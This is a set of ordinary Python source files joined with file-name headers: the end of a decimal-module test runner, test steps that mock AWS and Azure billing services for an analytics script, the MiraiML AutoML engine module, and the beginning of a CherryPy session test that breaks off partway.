self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
steps.py
|
from gevent import monkey
monkey.patch_all(subprocess=True)
import os
import sys
cwd = os.path.dirname(os.path.abspath(__file__))
scalrpy_dir = os.path.normpath(os.path.join(cwd, '../../..'))
sys.path.insert(0, scalrpy_dir)
scalrpytests_dir = os.path.join(cwd, '../..')
sys.path.insert(0, scalrpytests_dir)
from scalrpy import analytics_processing
from scalrpy.util import billing
from scalrpytests.steplib import lib
from scalrpytests.steplib.steps import *
import datetime
import multiprocessing
import mock
import shutil
import cherrypy
import threading
import json
class AnalyticsProcessingScript(lib.Script):
app_cls = analytics_processing.AnalyticsProcessing
name = 'analytics_processing'
class MockedDateTime(datetime.datetime):
@classmethod
def utcnow(cls):
dt_format = "%Y-%m-%d %H:%M:%S"
return datetime.datetime.strptime('2015-05-01 06:00:01', dt_format)
class MockedDate(datetime.date):
@classmethod
def today(cls):
return datetime.date(2015, 5, 4)
class AzureMockServer(object):
@cherrypy.expose
@cherrypy.tools.json_out()
def subscriptions_subscription_id_RateCard(self, *args, **kwds):
rate_file = os.path.join(scalrpy_dir, 'tests/fixtures/rate_resp.txt')
with open(rate_file, 'r') as f:
data = json.loads(f.read())
return data
@cherrypy.expose
@cherrypy.tools.json_out()
def subscriptions_subscription_id_UsageAggregates(self, *args, **kwds):
resolution = kwds['aggregationGranularity'].lower()
reported_start_time = datetime.datetime.strptime(kwds['reportedStartTime'], '%Y-%m-%dT%H:%S:%M+00:00')
reported_end_time = datetime.datetime.strptime(kwds['reportedEndTime'], '%Y-%m-%dT%H:%S:%M+00:00')
usage_file = os.path.join(scalrpy_dir,
'tests/fixtures/usage_resp_%s.txt' % resolution)
with open(usage_file, 'r') as f:
data = {'value': []}
raw_data = json.loads(f.read())
for row in raw_data['value']:
start_time = datetime.datetime.strptime(
row['properties']['usageStartTime'].split('+')[0], '%Y-%m-%dT%H:%M:%S')
if start_time < reported_start_time:
continue
if start_time > reported_end_time:
continue
data['value'].append(row)
return data
@cherrypy.expose
@cherrypy.tools.json_out()
def token_tenant_name(self, *args, **kwds):
return {'access_token': 'access_token'}
def mock_download_aws_billing_file_ok():
def get_contents_to_filename(csv_zip_file):
src = os.path.join(scalrpy_dir, 'tests/fixtures', os.path.basename(csv_zip_file))
dst = csv_zip_file
shutil.copy(src, dst)
bucket = mock.MagicMock(name='bucket')
keys = []
for name in [
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-04.csv.zip',
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip',
'333-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip']:
key = mock.MagicMock()
key.name = name
key.last_modified = 'Fri, 01 May 2015 05:50:57 GMT'
key.size = 1024
key.get_contents_to_filename = get_contents_to_filename
keys.append(key)
bucket.list.return_value = keys
bucket.get_key.return_value = keys[1]
conn = mock.MagicMock(name='conn')
conn.get_bucket.return_value = bucket
billing.boto.s3.connect_to_region = mock.MagicMock(name='connect_to_region')
billing.boto.s3.connect_to_region.return_value = conn
def mock_download_aws_billing_file_not_in_bucket():
bucket = mock.MagicMock(name='key')
bucket.list.return_value = []
conn = mock.MagicMock(name='conn')
conn.get_bucket.return_value = bucket
billing.boto.s3.connect_to_region = mock.MagicMock(name='connect_to_region')
billing.boto.s3.connect_to_region.return_value = conn
def mock_download_aws_billing_file_not_ok():
def get_contents_to_filename(csv_zip_file):
pass
bucket = mock.MagicMock(name='bucket')
keys = []
for name in [
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-04.csv.zip',
'123-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip',
'333-aws-billing-detailed-line-items-with-resources-and-tags-2015-05.csv.zip']:
key = mock.MagicMock()
key.name = name
key.last_modified = 'Fri, 01 May 2015 05:50:57 GMT'
key.size = 1024
key.get_contents_to_filename = get_contents_to_filename
keys.append(key)
bucket.list.return_value = keys
bucket.get_key.return_value = keys[1]
conn = mock.MagicMock(name='conn')
conn.get_bucket.return_value = bucket
billing.boto.s3.connect_to_region = mock.MagicMock(name='connect_to_region')
billing.boto.s3.connect_to_region.return_value = conn
@step(u"^Mock download AWS billing file not in bucket$")
def download_aws_billing_file_not_in_bucket(step):
lib.world.mock_download_aws_billing_file = mock_download_aws_billing_file_not_in_bucket
@step(u"^Mock download AWS billing file not ok$")
def download_aws_billing_file_not_ok(step):
lib.world.mock_download_aws_billing_file = mock_download_aws_billing_file_not_ok
def analytics_process():
analytics_processing.datetime.datetime = MockedDateTime
analytics_processing.datetime.date = MockedDate
billing.AzureBilling.ratecard_url = 'http://127.0.0.1:8080/subscriptions_{subscription_id}_RateCard'
billing.AzureBilling.usage_url = 'http://127.0.0.1:8080/subscriptions_{subscription_id}_UsageAggregates'
billing.AzureBilling.token_url = 'http://127.0.0.1:8080/token_{tenant_id}'
analytics_processing.launch_delay = 0
lib.world.mock_download_aws_billing_file()
analytics_processing.app.load_config()
analytics_processing.app.configure()
t = threading.Thread(target=cherrypy.quickstart, args=(AzureMockServer(),))
t.start()
time.sleep(2)
analytics_processing.app.run()
t.join()
@step(u"^White Rabbit starts Analytics Processing script with options '(.*)'$")
def start(step, opts):
argv = opts.split() + ['start']
analytics_processing.app = analytics_processing.AnalyticsProcessing(argv=argv)
lib.world.app_process = multiprocessing.Process(target=analytics_process)
lib.world.app_process.start()
@step(u"^White Rabbit stops Analytics Processing script$")
def stop(step):
if lib.world.app_process.is_alive():
lib.world.app_process.terminate()
lib.ScriptCls = AnalyticsProcessingScript
def before_scenario(scenario):
lib.world.mock_download_aws_billing_file = mock_download_aws_billing_file_ok
def after_scenario(scenario):
pass
before.each_scenario(before_scenario)
after.each_scenario(after_scenario)
|
main.py
|
from threading import Thread
import pandas as pd
import warnings
import time
import os
import gc
from miraiml.util import is_valid_filename
from miraiml.core import MiraiSeeker, Ensembler
from miraiml.core import load_base_model, dump_base_model
class SearchSpace:
"""
This class represents the search space of hyperparameters for a base model.
:type id: str
:param id: The id that will be associated with the models generated within
this search space.
:type model_class: type
:param model_class: Any class that represents a statistical model. It must
implement the methods ``fit`` as well as ``predict`` for regression or
``predict_proba`` for classification problems.
:type parameters_values: dict, optional, default=None
:param parameters_values: A dictionary containing lists of values to be
tested as parameters when instantiating objects of ``model_class`` for
``id``.
:type parameters_rules: function, optional, default=lambda x: None
:param parameters_rules: A function that constrains certain parameters because
of the values assumed by others. It must receive a dictionary as input and
doesn't need to return anything. Not used if ``parameters_values`` has no
keys.
.. warning::
Make sure that the parameters accessed in ``parameters_rules`` exist
in the set of parameters defined on ``parameters_values``, otherwise
the engine will attempt to access an invalid key.
:raises: ``NotImplementedError`` if a model class does not implement ``fit``
or none of ``predict`` or ``predict_proba``.
:raises: ``TypeError`` if some parameter is of a prohibited type.
:raises: ``ValueError`` if a provided ``id`` is not allowed.
:Example:
::
>>> import numpy as np
>>> from sklearn.linear_model import LogisticRegression
>>> from miraiml import SearchSpace
>>> def logistic_regression_parameters_rules(parameters):
... if parameters['solver'] in ['newton-cg', 'sag', 'lbfgs']:
... parameters['penalty'] = 'l2'
>>> search_space = SearchSpace(
... id = 'Logistic Regression',
... model_class = LogisticRegression,
... parameters_values = {
... 'penalty': ['l1', 'l2'],
... 'C': np.arange(0.1, 2, 0.1),
... 'max_iter': np.arange(50, 300),
... 'solver': ['newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga'],
... 'random_state': [0]
... },
... parameters_rules = logistic_regression_parameters_rules
... )
.. warning::
**Do not** allow ``random_state`` assume multiple values. If ``model_class``
has a ``random_state`` parameter, force the engine to always choose the
same value by providing a list with a single element.
Allowing ``random_state`` to assume multiple values will confuse the engine
because the scores will be unstable even with the same choice of
hyperparameters and features.
"""
def __init__(self, id, model_class, parameters_values=None,
parameters_rules=lambda x: None):
self.__validate__(id, model_class, parameters_values, parameters_rules)
self.model_class = model_class
self.id = id
if parameters_values is None:
parameters_values = {}
self.parameters_values = parameters_values
self.parameters_rules = parameters_rules
@staticmethod
def __validate__(id, model_class, parameters_values, parameters_rules):
"""
Validates the constructor parameters.
"""
if not isinstance(id, str):
raise TypeError('id must be a string')
if not is_valid_filename(id):
raise ValueError('Invalid id: {}'.format(id))
dir_model_class = dir(model_class)
if 'fit' not in dir_model_class:
raise NotImplementedError('model_class must implement fit')
if 'predict' not in dir_model_class and 'predict_proba' not in dir_model_class:
raise NotImplementedError('model_class must implement predict or predict_proba')
if parameters_values is not None and not isinstance(parameters_values, dict):
raise TypeError('parameters_values must be None or a dictionary')
if not callable(parameters_rules):
raise TypeError('parameters_rules must be a function')
class Config:
"""
This class defines the general behavior of the engine.
:type local_dir: str
:param local_dir: The name of the folder in which the engine will save its
internal files. If the directory doesn't exist, it will be created
automatically. ``..`` and ``/`` are not allowed to compose ``local_dir``.
:type problem_type: str
:param problem_type: ``'classification'`` or ``'regression'``. The problem
type. Multi-class classification problems are not supported.
:type search_spaces: list
:param search_spaces: The list of :class:`miraiml.SearchSpace`
objects to optimize. If ``search_spaces`` has length 1, the engine
will not run ensemble cycles.
:type score_function: function
:param score_function: A function that receives the "truth" and the predictions
(in this order) and returns the score. Bigger scores must mean better models.
:type use_all_features: bool, optional, default=False
:param use_all_features: Whether to force MiraiML to always use all features
or not.
:type n_folds: int, optional, default=5
:param n_folds: The number of folds for the fitting/predicting process. The
minimum value allowed is 2.
:type stratified: bool, optional, default=True
:param stratified: Whether to stratify folds on target or not. Only used if
``problem_type == 'classification'``.
:type ensemble_id: str, optional, default=None
:param ensemble_id: The id for the ensemble. If none is given, the engine will
not ensemble base models.
:type stagnation: int or float, optional, default=60
:param stagnation: The amount of time (in minutes) for the engine to
automatically interrupt itself if no improvement happens. Negative numbers
are interpreted as "infinite".
.. warning::
Stagnation checks only happen after the engine finishes at least one
optimization cycle. In other words, every base model and the ensemble
(if set) must be scored at least once.
:raises: ``NotImplementedError`` if a model class does not implement the proper
method for prediction.
:raises: ``TypeError`` if some parameter is not of its allowed type.
:raises: ``ValueError`` if some parameter has an invalid value.
:Example:
::
>>> from sklearn.metrics import roc_auc_score
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.tree import DecisionTreeClassifier
>>> from miraiml import SearchSpace, Config
>>> search_spaces = [
... SearchSpace('Naive Bayes', GaussianNB),
... SearchSpace('Decicion Tree', DecisionTreeClassifier)
... ]
>>> config = Config(
... local_dir = 'miraiml_local',
... problem_type = 'classification',
... score_function = roc_auc_score,
... search_spaces = search_spaces,
... use_all_features = False,
... n_folds = 5,
... stratified = True,
... ensemble_id = 'Ensemble',
... stagnation = -1
... )
"""
def __init__(self, local_dir, problem_type, score_function, search_spaces,
use_all_features=False, n_folds=5, stratified=True,
ensemble_id=None, stagnation=60):
self.__validate__(local_dir, problem_type, score_function, search_spaces,
use_all_features, n_folds, stratified, ensemble_id,
stagnation)
self.local_dir = local_dir
if self.local_dir[-1] != '/':
self.local_dir += '/'
self.problem_type = problem_type
self.search_spaces = search_spaces
self.score_function = score_function
self.use_all_features = use_all_features
self.n_folds = n_folds
self.stratified = stratified
self.ensemble_id = ensemble_id
self.stagnation = stagnation
@staticmethod
def __validate__(local_dir, problem_type, score_function, search_spaces,
use_all_features, n_folds, stratified, ensemble_id,
stagnation):
"""
Validates the constructor parameters.
"""
if not isinstance(local_dir, str):
raise TypeError('local_dir must be a string')
if not is_valid_filename(local_dir):
raise ValueError('Invalid directory name: {}'.format(local_dir))
if not isinstance(problem_type, str):
raise TypeError('problem_type must be a string')
if problem_type not in ('classification', 'regression'):
raise ValueError('Invalid problem type')
if not callable(score_function):
raise TypeError('score_function must be a function')
if not isinstance(search_spaces, list):
raise TypeError('search_spaces must be a list')
if len(search_spaces) == 0:
raise ValueError('No search spaces')
ids = []
for search_space in search_spaces:
if not isinstance(search_space, SearchSpace):
raise TypeError('All search spaces must be objects of ' +
'miraiml.SearchSpace')
id = search_space.id
if id in ids:
raise ValueError('Duplicated search space id: {}'.format(id))
ids.append(id)
dir_model_class = dir(search_space.model_class)
if problem_type == 'classification' and 'predict_proba' not in dir_model_class:
raise NotImplementedError('Model class of id {} '.format(id) +
'must implement predict_proba for ' +
'classification problems')
if problem_type == 'regression' and 'predict' not in dir_model_class:
raise NotImplementedError('Model class of id {} '.format(id) +
'must implement predict for regression problems')
if not isinstance(use_all_features, bool):
raise TypeError('use_all_features must be a boolean')
if not isinstance(n_folds, int):
raise TypeError('n_folds must be an integer')
if n_folds < 2:
raise ValueError('n_folds must be greater than 1')
if not isinstance(stratified, bool):
raise TypeError('stratified must be a boolean')
if ensemble_id is not None and not isinstance(ensemble_id, str):
raise TypeError('ensemble_id must be None or a string')
if isinstance(ensemble_id, str) and not is_valid_filename(ensemble_id):
raise ValueError('invalid ensemble_id')
if ensemble_id in ids:
raise ValueError('ensemble_id cannot have the same id of a ' +
'search space')
if not isinstance(stagnation, int) and not isinstance(stagnation, float):
raise TypeError('stagnation must be an integer or a float')
class Engine:
"""
This class offers the controls for the engine.
:type config: miraiml.Config
:param config: The configurations for the behavior of the engine.
:type on_improvement: function, optional, default=None
:param on_improvement: A function that will be executed everytime the engine
finds an improvement for some id. It must receive a ``status`` parameter,
which is the return of the method :func:`request_status` (an instance of
:class:`miraiml.Status`).
:raises: ``TypeError`` if ``config`` is not an instance of :class:`miraiml.Config`
or ``on_improvement`` (if provided) is not callable.
:Example:
::
>>> from sklearn.metrics import roc_auc_score
>>> from sklearn.naive_bayes import GaussianNB
>>> from sklearn.tree import DecisionTreeClassifier
>>> from miraiml import SearchSpace, Config, Engine
>>> search_spaces = [
... SearchSpace('Naive Bayes', GaussianNB),
... SearchSpace('Decision Tree', DecisionTreeClassifier)
... ]
>>> config = Config(
... local_dir = 'miraiml_local',
... problem_type = 'classification',
... score_function = roc_auc_score,
... search_spaces = search_spaces,
... ensemble_id = 'Ensemble'
... )
>>> def on_improvement(status):
... print('Scores:', status.scores)
>>> engine = Engine(config, on_improvement=on_improvement)
"""
def __init__(self, config, on_improvement=None):
self.__validate__(config, on_improvement)
self.config = config
self.on_improvement = on_improvement
self.train_predictions_df = None
self.test_predictions_df = None
self.__is_running__ = False
self.must_interrupt = False
self.mirai_seeker = None
self.models_dir = config.local_dir + 'models/'
self.train_data = None
self.ensembler = None
self.n_cycles = 0
self.last_improvement_timestamp = None
@staticmethod
def __validate__(config, on_improvement):
"""
Validates the constructor parameters.
"""
if not isinstance(config, Config):
raise TypeError('miraiml.Engine\'s constructor requires an object ' +
'of miraiml.Config')
if on_improvement is not None and not callable(on_improvement):
raise TypeError('on_improvement must be None or a function')
def is_running(self):
"""
Tells whether the engine is running or not.
:rtype: bool
:returns: ``True`` if the engine is running and ``False`` otherwise.
"""
return self.__is_running__
def interrupt(self):
"""
Makes the engine stop on the first opportunity.
.. note::
This method is **not** asynchronous. It will wait until the engine
stops.
"""
self.must_interrupt = True
if self.ensembler is not None:
self.ensembler.interrupt()
while self.__is_running__:
time.sleep(.1)
self.must_interrupt = False
def load_train_data(self, train_data, target_column, restart=False):
"""
Interrupts the engine and loads the train dataset. All of its columns must
be either instances of ``str`` or ``int``.
.. warning::
Loading new training data will **always** trigger the loss of history
for optimization.
:type train_data: pandas.DataFrame
:param train_data: The training data.
:type target_column: str or int
:param target_column: The target column identifier.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after updating data or not.
:raises: ``TypeError`` if ``train_data`` is not an instance of
``pandas.DataFrame``.
:raises: ``ValueError`` if ``target_column`` is not a column of
``train_data`` or if some column name is of a prohibited type.
"""
self.__validate_train_data__(train_data, target_column)
self.columns_renaming_map = {}
self.columns_renaming_unmap = {}
for column in train_data.columns:
column_renamed = str(column)
self.columns_renaming_map[column] = column_renamed
self.columns_renaming_unmap[column_renamed] = column
self.target_column = target_column
train_data = train_data.rename(columns=self.columns_renaming_map)
self.interrupt()
self.train_data = train_data.drop(columns=target_column)
self.train_target = train_data[target_column]
self.all_features = list(self.train_data.columns)
if self.mirai_seeker is not None:
self.mirai_seeker.reset()
if restart:
self.restart()
@staticmethod
def __validate_train_data__(train_data, target_column):
"""
Validates the train data.
"""
if not isinstance(train_data, pd.DataFrame):
raise TypeError('Training data must be an object of pandas.DataFrame')
train_columns = train_data.columns
if target_column not in train_columns:
raise ValueError('target_column must be a column of train_data')
for column in train_columns:
if not isinstance(column, str) and not isinstance(column, int):
raise ValueError('All columns names must be either str or int')
def load_test_data(self, test_data, restart=False):
"""
Interrupts the engine and loads the test dataset. All of its columns must
be columns in the train data.
The test dataset is the one for which we don't have the values for the
target column. This method should be used to load data in production.
.. warning::
This method can only be called after
:func:`miraiml.Engine.load_train_data`
:type test_data: pandas.DataFrame, optional, default=None
:param test_data: The testing data. Use the default value if you don't
need to make predictions for data with unknown labels.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after loading data or not.
:raises: ``RuntimeError`` if this method is called before loading the
train data.
:raises: ``ValueError`` if the column names are not consistent.
"""
if self.train_data is None:
raise RuntimeError('This method cannot be called before load_train_data')
self.__validate_test_data__(test_data)
self.test_data = test_data.rename(columns=self.columns_renaming_map)
if restart:
self.restart()
def __validate_test_data__(self, test_data):
"""
Validates the test data.
"""
for column in self.columns_renaming_map:
if column != self.target_column and column not in test_data.columns:
raise ValueError(
'Column {} is not a column in the train data'.format(column)
)
def clean_test_data(self, restart=False):
"""
Cleans the test data from the buffer.
.. note::
Keep in mind that if you don't intend to make predictions for
unlabeled data, the engine will run faster with a clean test data
buffer.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after cleaning test data or
not.
"""
self.interrupt()
self.test_data = None
if restart:
self.restart()
def shuffle_train_data(self, restart=False):
"""
Interrupts the engine and shuffles the training data.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after shuffling data or not.
:raises: ``RuntimeError`` if the engine has no data loaded.
.. note::
It's a good practice to shuffle the training data periodically to avoid
overfitting on a particular folding pattern.
"""
if self.train_data is None:
raise RuntimeError('No data to shuffle')
self.interrupt()
seed = int(time.time())
self.train_data = self.train_data.sample(frac=1, random_state=seed)
self.train_target = self.train_target.sample(frac=1, random_state=seed)
if restart:
self.restart()
def reconfigure(self, config, restart=False):
"""
Interrupts the engine and loads a new configuration.
.. warning::
Reconfiguring the engine will **always** trigger the loss of history
for optimization.
:type config: miraiml.Config
:param config: The configurations for the behavior of the engine.
:type restart: bool, optional, default=False
:param restart: Whether to restart the engine after reconfiguring it or
not.
"""
self.interrupt()
self.config = config
if self.mirai_seeker is not None:
self.mirai_seeker.reset()
if restart:
self.restart()
def restart(self):
"""
Interrupts the engine and starts again from last checkpoint (if any). It
is also used to start the engine for the first time.
:raises: ``RuntimeError`` if no data is loaded.
"""
if self.train_data is None:
raise RuntimeError('No data to train')
self.interrupt()
def starter():
try:
self.__main_loop__()
except Exception:
self.__is_running__ = False
raise
Thread(target=starter).start()
def __improvement_trigger__(self):
"""
Called when an improvement happens.
"""
self.last_improvement_timestamp = time.time()
if self.on_improvement is not None:
self.on_improvement(self.request_status())
def __update_best__(self, score, id):
"""
Updates the best id of the engine.
"""
if self.best_score is None or score > self.best_score:
self.best_score = score
self.best_id = id
def __check_stagnation__(self):
"""
Checks whether the engine has reached stagnation or not. If so, the
engine is interrupted.
"""
if self.config.stagnation >= 0:
diff_in_seconds = time.time() - self.last_improvement_timestamp
if diff_in_seconds/60 > self.config.stagnation:
self.interrupt()
def __main_loop__(self):
"""
Main optimization loop.
"""
self.__is_running__ = True
if not os.path.exists(self.models_dir):
os.makedirs(self.models_dir)
self.base_models = {}
self.train_predictions_df = pd.DataFrame()
self.test_predictions_df = pd.DataFrame()
self.scores = {}
self.best_score = None
self.best_id = None
self.ensembler = None
self.mirai_seeker = MiraiSeeker(
self.config.search_spaces,
self.all_features,
self.config
)
self.n_cycles = 0
self.last_improvement_timestamp = time.time()
start = time.time()
for search_space in self.config.search_spaces:
if self.must_interrupt:
break
id = search_space.id
base_model_path = self.models_dir + id
base_model_class = search_space.model_class
if os.path.exists(base_model_path):
base_model = load_base_model(base_model_class, base_model_path)
parameters = base_model.parameters
parameters_values = search_space.parameters_values
for key, value in zip(parameters.keys(), parameters.values()):
if key not in parameters_values:
warnings.warn(
'Parameter ' + str(key) + ', set with value ' +
str(value) + ', from checkpoint is not on the ' +
'provided search space for the id ' + str(id),
RuntimeWarning
)
else:
if value not in parameters_values[key]:
warnings.warn(
'Value ' + str(value) + ' for parameter ' + str(key) +
' from checkpoint is not on the provided ' +
'search space for the id ' + str(id),
RuntimeWarning
)
else:
base_model = self.mirai_seeker.seek(search_space.id)
dump_base_model(base_model, base_model_path)
self.base_models[id] = base_model
train_predictions, test_predictions, score = base_model.predict(
self.train_data, self.train_target, self.test_data, self.config)
self.train_predictions_df[id] = train_predictions
self.test_predictions_df[id] = test_predictions
self.scores[id] = score
self.__update_best__(self.scores[id], id)
total_cycles_duration = time.time() - start
will_ensemble = len(self.base_models) > 1 and\
self.config.ensemble_id is not None
if will_ensemble:
self.ensembler = Ensembler(
list(self.base_models),
self.train_target,
self.train_predictions_df,
self.test_predictions_df,
self.scores,
self.config
)
ensemble_id = self.config.ensemble_id
if self.ensembler.optimize(total_cycles_duration):
self.__update_best__(self.scores[ensemble_id], ensemble_id)
self.__improvement_trigger__()
self.n_cycles = 1
while not self.must_interrupt:
gc.collect()
start = time.time()
for search_space in self.config.search_spaces:
self.__check_stagnation__()
if self.must_interrupt:
break
id = search_space.id
base_model = self.mirai_seeker.seek(id)
train_predictions, test_predictions, score = base_model.predict(
self.train_data, self.train_target,
self.test_data, self.config)
self.mirai_seeker.register_base_model(id, base_model, score)
if score > self.scores[id] or (
score == self.scores[id] and
len(base_model.features) < len(self.base_models[id].features)
):
self.scores[id] = score
self.train_predictions_df[id] = train_predictions
self.test_predictions_df[id] = test_predictions
self.__update_best__(score, id)
if will_ensemble:
self.ensembler.update()
self.__update_best__(self.scores[ensemble_id], ensemble_id)
self.__improvement_trigger__()
dump_base_model(base_model, self.models_dir + id)
else:
del train_predictions, test_predictions
total_cycles_duration += time.time() - start
self.n_cycles += 1
if will_ensemble:
if self.ensembler.optimize(total_cycles_duration/self.n_cycles):
self.__update_best__(self.scores[ensemble_id], ensemble_id)
self.__improvement_trigger__()
self.__is_running__ = False
def request_status(self):
"""
Queries the current status of the engine.
:rtype: miraiml.Status
:returns: The current status of the engine in the form of a dictionary.
If no score has been computed yet, returns ``None``.
"""
if self.best_id is None:
return None
train_predictions = None
if self.train_predictions_df is not None:
train_predictions = self.train_predictions_df.copy()
test_predictions = None
if self.test_data is not None and self.test_predictions_df is not None:
test_predictions = self.test_predictions_df.copy()
ensemble_weights = None
if self.ensembler is not None:
ensemble_weights = self.ensembler.weights.copy()
base_models = {}
for id in self.base_models:
base_model = self.base_models[id]
base_models[id] = dict(
model_class=base_model.model_class.__name__,
parameters=base_model.parameters.copy()
)
base_models[id]['features'] = [
self.columns_renaming_unmap[col] for col in base_model.features
]
histories = None
if self.mirai_seeker is not None:
histories = {}
for id in self.mirai_seeker.histories:
histories[id] = self.mirai_seeker.histories[id].copy()
return Status(
best_id=self.best_id,
scores=self.scores.copy(),
train_predictions=train_predictions,
test_predictions=test_predictions,
ensemble_weights=ensemble_weights,
base_models=base_models,
histories=histories
)
class Status:
"""
Represents the current status of the engine. Objects of this class are
not supposed to be instantiated by the user. Rather, they are returned
by the :func:`miraiml.Engine.request_status()` method.
The following attributes are accessible:
* ``best_id``: the id of the best base model (or ensemble)
* ``scores``: a dictionary containing the current score of each id
* ``train_predictions``: a ``pandas.DataFrame`` object containing the predictions\
for the train data for each id
* ``test_predictions``: a ``pandas.DataFrame`` object containing the predictions\
for the test data for each id
* ``ensemble_weights``: a dictionary containing the ensemble weights for\
each base model id
* ``base_models``: a dictionary containing the characteristics of each base\
model (accessed by its respective id)
* ``histories``: a dictionary of ``pandas.DataFrame`` objects for each id,\
containing the history of base models attempts and their respective scores.\
Hyperparameters columns end with the ``'__(hyperparameter)'`` suffix and\
features columns end with the ``'__(feature)'`` suffix. The score column\
can be accessed with the key ``'score'``. For more information, please\
check the :ref:`User Guide <mirai_seeker>`.
The characteristics of each base model are represent by dictionaries, containing
the following keys:
* ``'model_class'``: The name of the base model's modeling class
* ``'parameters'``: The dictionary of hyperparameters values
* ``'features'``: The list of features used
"""
def __init__(self, **kwargs):
self.__dict__ = kwargs
def build_report(self, include_features=False):
"""
Returns the report of the current status of the engine in a formatted
string.
:type include_features: bool, optional, default=False
:param include_features: Whether to include the list of features on the
report or not (may cause some visual mess).
:rtype: str
:returns: The formatted report.
"""
output = '########################\n'
output += ('best id: {}\n'.format(self.best_id))
output += ('best score: {}\n'.format(self.scores[self.best_id]))
if self.ensemble_weights is not None:
output += ('########################\n')
output += ('ensemble weights:\n')
weights_ = {}
for id in self.ensemble_weights:
weights_[self.ensemble_weights[id]] = id
for weight in reversed(sorted(weights_)):
id = weights_[weight]
output += (' {}: {}\n'.format(id, weight))
output += ('########################\n')
output += ('all scores:\n')
scores_ = {}
for id in self.scores:
scores_[self.scores[id]] = id
for score in reversed(sorted(scores_)):
id = scores_[score]
output += (' {}: {}\n'.format(id, score))
for id in sorted(self.base_models):
base_model = self.base_models[id]
features = sorted([str(feature) for feature in base_model['features']])
output += ('########################\n')
output += ('id: {}\n'.format(id))
output += ('model class: {}\n'.format(base_model['model_class']))
output += ('n features: {}\n'.format(len(features)))
output += ('parameters:\n')
parameters = base_model['parameters']
for parameter in sorted(parameters):
value = parameters[parameter]
output += (' {}: {}\n'.format(parameter, value))
if include_features:
output += ('features: {}\n'.format(', '.join(features)))
return output
|
test_session.py
|
import os
localDir = os.path.dirname(__file__)
import sys
import threading
import time
import cherrypy
from cherrypy._cpcompat import copykeys, HTTPConnection, HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib.httputil import response_codes
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ", ".join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
class Root:
_cp_config = {'tools.sessions.on': True,
'tools.sessions.storage_type' : 'ram',
'tools.sessions.storage_path' : localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
}
def clear(self):
cherrypy.session.cache.clear()
clear.exposed = True
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
data.exposed = True
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
